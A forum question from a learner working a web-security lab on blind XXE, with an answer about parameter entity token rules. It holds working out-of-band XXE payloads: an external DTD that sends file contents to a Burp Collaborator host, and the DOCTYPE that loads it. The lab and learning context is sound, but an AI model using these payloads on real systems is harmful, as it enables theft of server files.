# XML parameter Entity

Tags: xml, dtd

im learning about web security (current: XXE)
To solve the lab, i use Out-of-band tech.
Here is my enternal DTD:

```
<!ENTITY % ss "<!ENTITY &#x25; test SYSTEM 'http://xxx.burpcollaborator.net/?x=%file;'>">
%ss;
%test;
```

And my main exploit:

```
<!DOCTYPE foo [<!ENTITY % run SYSTEM "<URL-to-my-external-DTD"> %run;]>
```

Its work, but when i change the position of "%file;", it wont. Example:

```
<!ENTITY % ss "<!ENTITY &#x25; test SYSTEM 'http://%file;.xxx.burpcollaborator.net'>">
```

Why

Answer (score 0):

The replacement text of a parameter entity must consist of whole tokens, not fragments of a token.

(I wouldn't have been able to work this out for myself from reading the spec, but Bob DuCharme's "XML The Annotated Specification" is brilliant at explaining what the rather terse rules in the spec actually mean).